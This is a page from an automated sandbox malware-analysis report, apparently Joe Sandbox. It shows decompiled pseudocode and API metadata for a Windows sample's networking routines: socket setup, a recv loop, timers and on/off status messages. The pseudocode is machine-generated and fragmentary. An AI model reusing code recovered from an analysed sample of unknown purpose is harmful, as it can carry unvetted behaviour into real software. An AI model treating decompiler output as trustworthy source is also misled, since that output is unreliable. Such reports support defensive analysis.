															continue;
														}
													} else {
													}
													break;
												}
												goto L27;
											}
											_t606 =  *(_t661 + 8);
											__eflags =  *(_t606 + 0x10046) & 0x000000ff;
											if(( *(_t606 + 0x10046) & 0x000000ff) == 0) {
												L61:
												goto L74;
											}
											Sleep(0x3e8);
											 *(_t661 - 0x20) = 0xffffffff;
											_t521 =  *(_t661 + 8);
											__eflags =  *(_t521 + 0x10045) & 0x000000ff;
											if(( *(_t521 + 0x10045) & 0x000000ff) != 0) {
												 *(_t661 - 0x30) = 0;
											} else {
												 *(_t661 - 0x30) = 1;
											}
											 *((char*)( *(_t661 + 8) + 0x10045)) =  *(_t661 - 0x30);
											E00A439C0(E00A436C0( *(_t661 - 0x30)));
											_push(0x68b3);
											E00A43830(__eflags, E00A436C0(_t405), " %s M%X \n",  *(_t661 + 8) + 0x1001d);
											_t666 = _t663 + 0x10;
											_t409 =  *(_t661 + 8);
											_t524 =  *(_t409 + 0x10045) & 0x000000ff;
											__eflags =  *(_t409 + 0x10045) & 0x000000ff;
											if(( *(_t409 + 0x10045) & 0x000000ff) == 0) {
												 *(_t661 - 0x34) = "OFF\n\n";
											} else {
												 *(_t661 - 0x34) = "ON\n\n";
											}
											E00A43830(__eflags, E00A436C0(_t524), "\nCurrent operation : %s",  *(_t661 - 0x34));
											_t663 = _t666 + 0xc;
											 *(_t661 - 0x10) = 0;
											while(1) {
												_t499 =  *(_t661 + 8);
												__eflags =  *(_t661 - 0x10) -  *((intOrPtr*)(_t499 + 0x1014c));
												if( *(_t661 - 0x10) >=  *((intOrPtr*)(_t499 + 0x1014c))) {
													goto L61;
												}
												_t413 =  *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4));
												__eflags =  *((intOrPtr*)(_t413 + 0xc)) -  *(_t661 - 0x14);
												if( *((intOrPtr*)(_t413 + 0xc)) ==  *(_t661 - 0x14)) {
													_t614 =  *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4));
													__eflags =  *(_t614 + 8) & 0x000000ff;
													if(( *(_t614 + 8) & 0x000000ff) != 0) {
														 *(_t661 - 8) = E00A465E0( *(_t661 - 4), 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)))), 1,  *(_t661 + 8),  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)) + 9) & 0x000000ff);
													}
													_t416 =  *(_t661 + 8);
													_t499 =  *(_t416 + 0x10018) & 0x000000ff;
													__eflags = ( *(_t416 + 0x10018) & 0x000000ff) - 1;
													if(( *(_t416 + 0x10018) & 0x000000ff) != 1) {
														 *(_t661 - 8) = E00A465E0( *(_t661 - 4), 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)))), 0,  *(_t661 + 8),  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)) + 9) & 0x000000ff);
														_t499 =  *(_t661 + 8);
														__eflags = ( *(_t499 + 0x10018) & 0x000000ff) - 1;
														if(( *(_t499 + 0x10018) & 0x000000ff) != 1) {
															__eflags =  *(_t661 - 8) & 0x00000040;
															if(( *(_t661 - 8) & 0x00000040) == 0) {
																E00A439C0(E00A436C0(_t499));
																_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4)))));
																_push(0x68b1);
																__eflags =  *(_t661 + 8) + 0x1001d;
																E00A43830(__eflags, E00A436C0( *((intOrPtr*)( *((intOrPtr*)( *(_t661 + 8) + 0x10148)) +  *(_t661 - 0x10) * 4))), " %s M%X %d\n",  *(_t661 + 8) + 0x1001d);
																_t663 = _t663 + 0x14;
															}
															L48:
															_t427 =  *(_t661 - 0x10) + 1;
															__eflags = _t427;
															 *(_t661 - 0x10) = _t427;
															continue;
														}
													} else {
													}
													goto L61;
												}
												goto L48;
											}
											goto L61;
										}
										_t649 =  *(_t661 - 0x14) + 1;
										__eflags = _t649;
										 *(_t661 - 0x14) = _t649;
									}
									_t355 =  *(_t661 + 8);
									__eflags =  *(_t355 + 0x10046) & 0x000000ff;
									if(( *(_t355 + 0x10046) & 0x000000ff) != 0) {
										_t576 =  *(_t661 + 8);
										__eflags =  *(_t661 - 0x20) -  *((intOrPtr*)(_t576 + 0x10d58));
										if( *(_t661 - 0x20) >=  *((intOrPtr*)(_t576 + 0x10d58))) {
											 *(_t661 - 0x20) = 0xffffffff;
											_t495 =  *(_t661 + 8);
											__eflags =  *(_t495 + 0x10045) & 0x000000ff;
											if(( *(_t495 + 0x10045) & 0x000000ff) != 0) {
												 *(_t661 - 0x38) = 0;
											} else {
												 *(_t661 - 0x38) = 1;
											}
											 *((char*)( *(_t661 + 8) + 0x10045)) =  *(_t661 - 0x38);
											E00A439C0(E00A436C0( *(_t661 - 0x38)));
											_push(0x68b3);
											E00A43830(__eflags, E00A436C0(_t358), " %s M%X \n",  *(_t661 + 8) + 0x1001d);
											_t665 = _t663 + 0x10;
											_t362 =  *(_t661 + 8);
											_t498 =  *(_t362 + 0x10045) & 0x000000ff;
											__eflags =  *(_t362 + 0x10045) & 0x000000ff;
											if(( *(_t362 + 0x10045) & 0x000000ff) == 0) {
												 *(_t661 - 0x3c) = "OFF\n\n";
											} else {
												 *(_t661 - 0x3c) = "ON\n\n";
											}
											E00A43830(__eflags, E00A436C0(_t498), "\nCurrent operation : %s",  *(_t661 - 0x3c));
											_t663 = _t665 + 0xc;
										}
									}
									Sleep(0x3e8);
									while(1) {
										L92:
										 *(_t661 - 8) = E00A46220( *(_t661 - 4),  *(_t661 + 8));
										 *( *(_t661 + 8) + 0x10018) = 1;
										if(( *( *(_t661 + 8) + 0x10018) & 0x000000ff) != 1) {
										}
										goto L1;
									}
								}
								 *((intOrPtr*)( *(_t661 + 8) + 0x10038)) = E00A46310( *(_t661 - 4),  *(_t661 + 8));
								_t651 =  *(_t661 + 8);
								__eflags =  *((intOrPtr*)(_t651 + 0x10038)) - 0xffffffff;
								if( *((intOrPtr*)(_t651 + 0x10038)) != 0xffffffff) {
									_push( *((intOrPtr*)( *(_t661 + 8) + 0x10038)));
									_push(0x68b4);
									E00A43830(__eflags, E00A436C0( *((intOrPtr*)( *(_t661 + 8) + 0x10038))), " %s ST%X %d\n",  *(_t661 + 8) + 0x1001d);
									_t663 = _t663 + 0x14;
								}
								goto L92;
							}
							_t472 =  *(_t661 + 8);
							__eflags =  *(_t472 + 0xc);
							if( *(_t472 + 0xc) != 0) {
								_t565 =  *(_t661 + 8);
								_t473 =  *(_t661 - 0x28);
								asm("cdq");
								__eflags = _t473 %  *(_t565 + 0xc);
								if(_t473 %  *(_t565 + 0xc) == 0) {
									_t475 =  *( *(_t661 + 8) + 0x10040) * 0x3e8;
									__eflags = _t475;
									Sleep(_t475);
								}
							}
							continue;
						}
						_t477 = E00A45650( *(_t661 + 8) + 0x1001d,  *((intOrPtr*)( *(_t661 + 8) + 0x10034))); // executed
						 *(_t661 - 4) = _t477;
						if( *(_t661 - 4) != 0xffffffff) {
							 *( *(_t661 + 8) + 0x10018) = 0;
							 *((char*)( *(_t661 + 8) + 0x1001b)) = 1;
							 *( *(_t661 + 8) + 4) = 0;
							 *( *(_t661 + 8) + 8) = 0;
							 *(_t661 - 8) = E00A46140( *(_t661 - 4),  *(_t661 + 8));
							 *(_t661 - 8) = E00A45F10( *(_t661 - 4),  *(_t661 + 8));
							goto L7;
						} else {
							 *( *(_t661 + 8) + 0x10018) = 1;
							 *((char*)( *(_t661 + 8) + 0x1001b)) = 0;
							break;
						}
					}
					__imp__#116(); // executed
					return 0;
				}
			}

APIs

Part of subcall function 00A46220: Sleep.KERNEL32(000003E8,00000000,00000000,?), ref: 00A46295

WSACleanup.WS2_32 ref: 00A473AE

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: CleanupSleep
String ID:
API String ID: 1660135218-0
Opcode ID: 06252617cd79ff6bea8b0e6aaacc7d2d37bdc9f02970c545ca715a816c641e1c
Instruction ID: 1a67edb59592535c6970aa40913f1bf736d501c5ac8d3b8f40f4c109939175e1
Opcode Fuzzy Hash: 06252617cd79ff6bea8b0e6aaacc7d2d37bdc9f02970c545ca715a816c641e1c
Instruction Fuzzy Hash: AF213D74904148DFCB15CFA4C180AEDBBF1AF89314F2481A9E949AF341C371AE81EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A455F0 Relevance: 1.5, APIs: 1, Instructions: 33
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00A455F0(signed int __eax, intOrPtr __ecx, signed char _a4, intOrPtr _a8) {
				signed int _v8;

				_t18 = __ecx;
				__imp__#23(2, 1, 6, __ecx); // executed
				_v8 = __eax;
				if(_v8 != 0xffffffff) {
					if((_a4 & 0x000000ff) != 0) {
						_t18 = _v8;
						E00A453F0(_v8, 1); // executed
					}
					E00A45430(_t18, _v8, _a8); // executed
					E00A45460(_a8, _v8, _a8); // executed
					return _v8;
				}
				return __eax | 0xffffffff;
			}

0x00a455f0
0x00a455fa
0x00a45600
0x00a45607
0x00a45614
0x00a45618
0x00a4561c
0x00a4561c
0x00a45629
0x00a45636
0x00000000
0x00a4563b
0x00000000

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 00A455FA

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: socket
String ID:
API String ID: 98920635-0
Opcode ID: 3fab3d4fffe7906534adc562e2d1cbef01e4753e0a6f8b22649ad06c39431220
Instruction ID: d002568e89359e05d84c72da2c742fc31160cbbdf53e459687d9f865fcc442a8
Opcode Fuzzy Hash: 3fab3d4fffe7906534adc562e2d1cbef01e4753e0a6f8b22649ad06c39431220
Instruction Fuzzy Hash: F0F03679E10608FBCB10DBF4C945E5FB7799F84720F548344BA155B1C2CA71DE009760

Uniqueness

Uniqueness Score: -1.00%

Function 00A45490 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

select.WS2_32(00000000,00000000,?,?,00000000), ref: 00A454CC

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 744c77d2b1d8a3c1a60986a57f19fe84359e21362ec073d4adab88c088181584
Instruction ID: 2ae916c53e1d76d3247c7cf249049572fd6486bd58b22b329d9e12d708f12c9d
Opcode Fuzzy Hash: 744c77d2b1d8a3c1a60986a57f19fe84359e21362ec073d4adab88c088181584
Instruction Fuzzy Hash: 7DF0C775A0010CEFCB48CF98D89299E7BBEEB8D310F008159BA0AD72D0DA3099508BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A42BD0 Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A42BD0(intOrPtr __ecx, long _a4) {
				intOrPtr _v8;
				char _v12;

				_v8 = __ecx;
				E00A426E0( &_v12, _v8);
				while( *((intOrPtr*)(_v8 + 0x1a8)) != 0) {
					E00A429C0(_v8, _a4); // executed
				}
				return E00A42710( &_v12);
			}

0x00a42bd6
0x00a42be0
0x00a42be5
0x00a42bf8
0x00a42bf8
0x00a42c0a

APIs

Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::_Scoped_lock.LIBCMTD ref: 00A42BE0

Part of subcall function 00A429C0: WaitForMultipleObjects.KERNEL32(?,000000E7,00000000,?), ref: 00A429EA
Part of subcall function 00A429C0: CloseHandle.KERNEL32(?,?), ref: 00A42A39
Part of subcall function 00A429C0: CloseHandle.KERNEL32(?), ref: 00A42A4A

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: CloseHandle$Concurrency::details::_CriticalLock::_MultipleObjectsReentrantScoped_lockScoped_lock::_Wait
String ID:
API String ID: 2294125826-0
Opcode ID: f4d5f29d4d887a9af5657fbf7a5f765e957412d8a915618f7495100431f658c4
Instruction ID: 9b910f622f59d0c640dbacd2c257ec809c9956316da1c20f0da9ae178842a0cc
Opcode Fuzzy Hash: f4d5f29d4d887a9af5657fbf7a5f765e957412d8a915618f7495100431f658c4
Instruction Fuzzy Hash: ECE01A39904008EBC704EF94CA42AEEB775EF84300FA041A9F50567291DB306F46DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A453F0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(00000001,8004667E,00000001), ref: 00A45421

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 60adfe61197aedf0e81ddb424abcb27cbd224e9a6f3cf55c0fb90559c1b7a464
Instruction ID: acd75987f89a4d2ce0d6d7642654c7627abe5ba9d0a94c4e26a988cdff910a53
Opcode Fuzzy Hash: 60adfe61197aedf0e81ddb424abcb27cbd224e9a6f3cf55c0fb90559c1b7a464
Instruction Fuzzy Hash: D5E04F79D04208EBCB00DFE0D804AEEBBB8AB80706F10809AE8015B240D7719B68DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A45430 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(00000001,0000FFFF,00001005,000000FF,00000004), ref: 00A4544E

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: a9cf196155905ecb9a92fcd59971e26cb98e983b50c9c0a1975e88ed4baa77f1
Instruction ID: 777babc0fe3aa003dab4b48c41b53d194458217058e7d0ffe0c49d98fc1e4951
Opcode Fuzzy Hash: a9cf196155905ecb9a92fcd59971e26cb98e983b50c9c0a1975e88ed4baa77f1
Instruction Fuzzy Hash: 92D05E79640208BBD710DF84DC46DBAB778EB49700F108259BF044B280E6B1AA14DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A45460 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(00000001,0000FFFF,00001006,000000FF,00000004), ref: 00A4547E

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 673081d974bb73caec2df3ff50d55d38ed14b20205a25cacf360616140561205
Instruction ID: 9c9bf84085984b32c5f6323449de18ff613dcc710c57c7e81d44f704e19a200e
Opcode Fuzzy Hash: 673081d974bb73caec2df3ff50d55d38ed14b20205a25cacf360616140561205
Instruction Fuzzy Hash: EBD05E79640208BBD710DF84DC42DBAB778EB49700F108259BF044B280E6B1AA14D790

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A45B30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112
networkCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00A45B30(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v4128;
				signed int _t60;
				intOrPtr _t66;
				void* _t69;
				void* _t70;
				signed int _t74;
				signed int _t76;
				signed int _t94;
				void* _t103;
				void* _t104;

				E00A48080();
				if(( *(_a8 + 0x1001b) & 0x000000ff) != 0) {
					_v32 = 0x1000;
					_v16 = 0;
					_v24 = 0;
					do {
						_t60 = _a4;
						__imp__#16(_t60,  &_v4128, 0x1000, 0);
						_v8 = _t60;
						__eflags = _v8;
						if(_v8 <= 0) {
							__eflags = _v8;
							if(_v8 != 0) {
								__imp__#111();
								_v28 = _t60;
								__eflags = _v28 - 0x274c;
								if(_v28 == 0x274c) {
									L17:
									_v8 = 0;
									goto L18;
								}
								_t66 = _a8;
								_t85 =  *(_t66 + 0x10019) & 0x000000ff;
								__eflags =  *(_t66 + 0x10019) & 0x000000ff;
								if(( *(_t66 + 0x10019) & 0x000000ff) == 0) {
									_t69 = E00A439C0(E00A436C0(_t85));
									__imp__#111();
									_t70 = E00A47DB0();
									__imp__#111(_t70, _t69);
									_push(_t70);
									_push(0x6860);
									__eflags = _a8 + 0x1001d;
									E00A43830(__eflags, E00A436C0(_t68), " %s M%X %d (%s)\n", _a8 + 0x1001d);
									_t104 = _t104 + 0x18;
								}
								 *((char*)(_a8 + 0x10018)) = 1;
								 *(_a8 + 0x1001b) = 0;
								goto L17;
							}
							goto L18;
						}
						_v24 = _v16;
						_v16 = _v16 + _v8;
						_v12 = 0;
						while(1) {
							__eflags = _v12 - _v8;
							if(_v12 >= _v8) {
								break;
							}
							__eflags = _v24 + _v12 - _a16;
							if(_v24 + _v12 < _a16) {
								_t76 = _v24 + _v12;
								__eflags = _t76;
								 *((char*)(_a12 + _t76)) =  *((intOrPtr*)(_t103 + _v12 - 0x101c));
							}
							_t74 = _v12 + 1;
							__eflags = _t74;
							_v12 = _t74;
						}
						_v8 = 0;
						L18:
						__eflags = _v8;
					} while (_v8 != 0);
					 *((intOrPtr*)(_a8 + 0x10014)) = _v16;
					E00A42540(_a8 + 0x14, 0x10000);
					_v20 = 0;
					while(1) {
						__eflags = _v20 - _v16;
						if(_v20 >= _v16) {
							break;
						}
						 *((char*)(_a8 + _v20 + 0x14)) =  *((intOrPtr*)(_a12 + _v20));
						_t94 = _v20 + 1;
						__eflags = _t94;
						_v20 = _t94;
					}
					return _v16;
				}
				return 0xffffff9c;
			}

0x00a45b38
0x00a45b49
0x00a45b55
0x00a45b5c
0x00a45b63
0x00a45b6a
0x00a45b78
0x00a45b7c
0x00a45b82
0x00a45b85
0x00a45b89
0x00a45be3
0x00a45be7
0x00a45beb
0x00a45bf1
0x00a45bf4
0x00a45bfb
0x00a45c61
0x00a45c61
0x00000000
0x00a45c61
0x00a45bfd
0x00a45c00
0x00a45c07
0x00a45c09
0x00a45c12
0x00a45c17
0x00a45c1e
0x00a45c24
0x00a45c2a
0x00a45c2b
0x00a45c33
0x00a45c45
0x00a45c4a
0x00a45c4a
0x00a45c50
0x00a45c5a
0x00000000
0x00a45c5a
0x00000000
0x00a45be9
0x00a45b8e
0x00a45b97
0x00a45b9a
0x00a45bac
0x00a45baf
0x00a45bb2
0x00000000
0x00000000
0x00a45bba
0x00a45bbd
0x00a45bc2
0x00a45bc2
0x00a45bd2
0x00a45bd2
0x00a45ba6
0x00a45ba6
0x00a45ba9
0x00a45ba9
0x00a45bd7
0x00a45c68
0x00a45c68
0x00a45c68
0x00a45c78
0x00a45c8a
0x00a45c8f
0x00a45ca1
0x00a45ca4
0x00a45ca7
0x00000000
0x00000000
0x00a45cb7
0x00a45c9b
0x00a45c9b
0x00a45c9e
0x00a45c9e
0x00000000
0x00a45cbc
0x00000000

APIs

recv.WS2_32(?,?,00001000,00000000), ref: 00A45B7C

Strings

%s M%X %d (%s), xrefs: 00A45C3A
L', xrefs: 00A45BF4

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: recv
String ID: %s M%X %d (%s)$L'
API String ID: 1507349165-2748533698
Opcode ID: 645701cdadc71ec847bcb6c359fac8bfdfee9207c1d4929e96ed8ce29adca9ed
Instruction ID: fd6542250fbb6f9fa1c622626794e20e57751e27ef744b58fc7c039f43a365f3
Opcode Fuzzy Hash: 645701cdadc71ec847bcb6c359fac8bfdfee9207c1d4929e96ed8ce29adca9ed
Instruction Fuzzy Hash: C1515B78D00209EBCF04DFA4C594BEEBBB1EF84304F248099E8556B342D3B4AB45DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A42C10 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 235
timeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00A42C10(intOrPtr* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				intOrPtr _v12;
				long _v16;
				struct _SYSTEMTIME _v32;
				void* _v36;
				struct _FILETIME _v44;
				intOrPtr _v48;
				char _v52;
				int _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				long _v80;
				intOrPtr _v84;
				long _v88;
				struct _SYSTEMTIME _v104;
				intOrPtr _v108;
				union _LARGE_INTEGER _v112;
				struct _SYSTEMTIME _v128;
				char _v136;
				struct _FILETIME _v144;
				short _v148;
				short _v150;
				signed short _v152;
				char _v160;
				struct _SYSTEMTIME _v176;
				short _v688;
				WCHAR* _t138;
				long _t145;
				intOrPtr _t220;

				_v8 = __ecx;
				 *_v8 = 0x36ee80;
				 *(_v8 + 4) = 0;
				 *(_v8 + 8) = 1;
				 *(_v8 + 0xc) = 0;
				 *(_v8 + 0x10) = 0;
				 *(_v8 + 0x14) = 0;
				if(_a4 != 0) {
					_v32.wYear = 0;
					_v32.wDayOfWeek = 0;
					_v32.wHour = 0;
					_v32.wSecond = 0;
					_v44.dwLowDateTime = 0;
					_v44.dwHighDateTime = 0;
					GetSystemTime( &_v32);
					_v56 = StrToIntA(E00A43360(_a4));
					if(_v56 >= (_v32.wMinute & 0x0000ffff)) {
						wnsprintfW( &_v688, 0x100, L"%02d:%lS", _v32.wHour & 0x0000ffff, _a4);
					} else {
						_v128.wYear = 0;
						_v128.wDayOfWeek = 0;
						_v128.wHour = 0;
						_v128.wSecond = 0;
						SystemTimeToFileTime( &_v32,  &_v44);
						_v16 = 0;
						_v12 = 0;
						E00A42560( &_v16,  &_v44, 8);
						asm("adc eax, 0x8");
						_v16 = _v16 + 0x61c46800;
						E00A42560( &_v44,  &_v16, 8);
						FileTimeToSystemTime( &_v44,  &_v128);
						wnsprintfW( &_v688, 0x100, L"%02d:%lS", _v128.wHour & 0x0000ffff, _a4);
					}
					_t138 =  &_v688;
					__imp__#94(_t138, 0x800, 0x80000003,  &_v136);
					if(_t138 >= 0) {
						asm("movsd xmm0, [ebp-0x84]");
						asm("movsd [esp], xmm0");
						__imp__#185( &_v160);
						if(_t138 != 0) {
							_v104.wYear = _v32.wYear;
							_v104.wDayOfWeek = _v32.wDayOfWeek;
							_v104.wHour = _v32.wHour;
							_v104.wSecond = _v32.wSecond;
							_v104.wHour = _v152;
							_v104.wMinute = _v150;
							_v104.wSecond = _v148;
							SystemTimeToFileTime( &_v104,  &_v64);
							SystemTimeToFileTime( &_v32,  &_v72);
							_t145 = CompareFileTime( &_v64,  &_v72);
							_t240 = _t145 - 1;
							if(_t145 == 1) {
								_v80 = _v64.dwLowDateTime;
								_v76 = _v64.dwHighDateTime;
								_v88 = _v72.dwLowDateTime;
								_v84 = _v72.dwHighDateTime;
								asm("sbb edx, [ebp-0x50]");
								_v52 = _v80 - _v88;
								_v48 = _v76;
								E00A42560( &_v144,  &_v52, 8);
								FileTimeToSystemTime( &_v144,  &_v176);
								_push(_v176.wSecond & 0x0000ffff);
								_push(_v176.wMinute & 0x0000ffff);
								_push(_v176.wHour & 0x0000ffff);
								E00A43830(_t240, E00A436C0(_v176.wSecond & 0x0000ffff), "M%X - %02d:%02d:%02d\n", 0x88b8);
								_v36 = CreateWaitableTimerW(0, 1, 0);
								_t94 = _v8 + 4; // 0x0
								 *((intOrPtr*)(_v8 + 0x10 +  *_t94 * 4)) = _v36;
								if(_v36 != 0) {
									_t220 = _v48;
									_v112.LowPart = E00A48040(_v52, _t220, 0xffffffff, 0xffffffff);
									_v108 = _t220;
									_t107 = _v8 + 4; // 0x0
									_t110 =  *_t107 * 4; // 0x6f002d
									if(SetWaitableTimer( *(_v8 + _t110 + 0x10),  &_v112, 0, 0, 0, 0) == 0) {
										_t117 = _v8 + 4; // 0x0
										_t120 =  *_t117 * 4; // 0x6f002d
										CloseHandle( *(_v8 + _t120 + 0x10));
										_t123 = _v8 + 4; // 0x0
										 *(_v8 + 0x10 +  *_t123 * 4) = 0;
									} else {
										_t113 = _v8 + 0xc; // 0x0
										 *(_v8 + 0xc) =  *_t113 + 1;
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00a42c19
0x00a42c1f
0x00a42c28
0x00a42c32
0x00a42c3c
0x00a42c46
0x00a42c50
0x00a42c5b
0x00a42c63
0x00a42c66
0x00a42c69
0x00a42c6c
0x00a42c71
0x00a42c74
0x00a42c7b
0x00a42c91
0x00a42c9b
0x00a42d49
0x00a42ca1
0x00a42ca3
0x00a42ca6
0x00a42ca9
0x00a42cac
0x00a42cb7
0x00a42cbd
0x00a42cc6
0x00a42cd3
0x00a42ce4
0x00a42ce7
0x00a42cf7
0x00a42d04
0x00a42d24
0x00a42d2a
0x00a42d63
0x00a42d6a
0x00a42d72
0x00a42d82
0x00a42d8a
0x00a42d8f
0x00a42d97
0x00a42da0
0x00a42da6
0x00a42dac
0x00a42db2
0x00a42dbc
0x00a42dc7
0x00a42dd2
0x00a42dde
0x00a42dec
0x00a42dfa
0x00a42e00
0x00a42e03
0x00a42e0c
0x00a42e12
0x00a42e18
0x00a42e1e
0x00a42e2a
0x00a42e2d
0x00a42e30
0x00a42e40
0x00a42e53
0x00a42e60
0x00a42e68
0x00a42e70
0x00a42e81
0x00a42e95
0x00a42e9b
0x00a42ea4
0x00a42eac
0x00a42eb2
0x00a42ebf
0x00a42ec2
0x00a42ed4
0x00a42eda
0x00a42ee7
0x00a42efd
0x00a42f03
0x00a42f08
0x00a42f11
0x00a42f17
0x00a42ee9
0x00a42eec
0x00a42ef5
0x00a42ef5
0x00a42ee7
0x00a42eac
0x00a42e03
0x00a42d97
0x00a42d72
0x00a42f25

APIs

